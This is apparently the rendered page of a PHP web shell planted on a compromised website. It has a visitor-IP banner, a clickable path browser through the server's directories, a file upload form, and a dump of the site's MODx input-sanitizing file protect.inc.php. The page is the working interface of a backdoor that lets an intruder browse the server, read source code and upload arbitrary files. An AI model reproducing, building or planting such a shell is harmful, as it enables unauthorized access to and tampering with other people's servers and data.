<!DOCTYPE HTML>
<HTML>
<HEAD>
<title></title>
<style>
body{
font-family: monospace;
font-weight: bold;
font-size: 18px;
background-color: #c5c5c5;
color: #000;
}
#content tr:hover{
background-color: #ccc;
}
#content .first{
background-color: #ccc;
}
#content .first:hover{
background-color: #ccc;
}
table{
border: 3px #000 solid;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #00f;
}
input,select,textarea{
border: 1px #000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
input {
 font-size: 18px;
 font-weight: bold;
 padding: 5px;
}
select {
font-size: 19px
}
textarea {
font-size: 10px
}
td, tr { padding: 2px 5px; }

</style>
</HEAD>
<BODY>
<hr width="920" color="black"/>
<hr width="920" color="black"/><center><p><h2>Your IP : 172.70.178.33</h2></p></center>
<hr width="920" color="black"/>
<table width="920" border="1px" cellpadding="7" cellspacing="0" align="center">
<tr><td style="padding: 8px">Current Path : <a href="?path=/">/</a><a href="?path=/var">var</a>/<a href="?path=/var/www">www</a>/<a href="?path=/var/www/element">element</a>/<a href="?path=/var/www/element/data">data</a>/<a href="?path=/var/www/element/data/www">www</a>/<a href="?path=/var/www/element/data/www/vsl-gates.ru">vsl-gates.ru</a>/<a href="?path=/var/www/element/data/www/vsl-gates.ru/manager">manager</a>/<a href="?path=/var/www/element/data/www/vsl-gates.ru/manager/includes">includes</a>/</td></tr><tr><td><form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input type="submit" value="Upload" />
</form>
</td></tr><tr><td style='padding: 8px'>Current File : /var/www/element/data/www/vsl-gates.ru/manager/includes/protect.inc.php</tr></td></table><br /><pre>&lt;?php
/**
 *    Protect against some common security flaws
 */

// Null is evil
if (strpos(urldecode($_SERVER['QUERY_STRING']), chr(0)) !== false)
    die();

// Unregister globals
if (@ ini_get('register_globals')) {
    foreach ($_REQUEST as $key =&gt; $value) {
        $$key = null; // This is NOT paranoid because
        unset ($$key); // unset may not work.
    }
}
$modxtags = array (
    '@&lt;script[^&gt;]*?&gt;.*?&lt;/script&gt;@si',
    '@&amp;#(\d+);@e',
    '@\[\[(.*?)\]\]@si',
    '@\[!(.*?)!\]@si',
    '@\[\~(.*?)\~\]@si',
    '@\[\((.*?)\)\]@si',
    '@{{(.*?)}}@si',
    '@\[\+(.*?)\+\]@si',
    '@\[\*(.*?)\*\]@si'
);
if (!function_exists('modx_sanitize_gpc')) {
    function modx_sanitize_gpc(&amp; $target, $modxtags, $limit= 3) {
        foreach ($target as $key =&gt; $value) {
            if (is_array($value) &amp;&amp; $limit &gt; 0) {
                modx_sanitize_gpc($value, $modxtags, $limit - 1);
            } else {
                $target[$key] = preg_replace($modxtags, &quot;&quot;, $value);
            }
        }
        return $target;
    }
}
modx_sanitize_gpc($_GET, $modxtags);
if (!defined('IN_MANAGER_MODE') || (defined('IN_MANAGER_MODE') &amp;&amp; (!IN_MANAGER_MODE || IN_MANAGER_MODE == 'false'))) {
    modx_sanitize_gpc($_POST, $modxtags);
}
modx_sanitize_gpc($_COOKIE, $modxtags);
modx_sanitize_gpc($_REQUEST, $modxtags);

foreach (array ('PHP_SELF', 'HTTP_USER_AGENT', 'HTTP_REFERER', 'QUERY_STRING') as $key) {
    $_SERVER[$key] = isset ($_SERVER[$key]) ? htmlspecialchars($_SERVER[$key], ENT_QUOTES) : null;
}

// Unset vars
unset ($modxtags, $key, $value);
</pre><center><hr width="920" color="black"/> <center>
</BODY>
</HTML>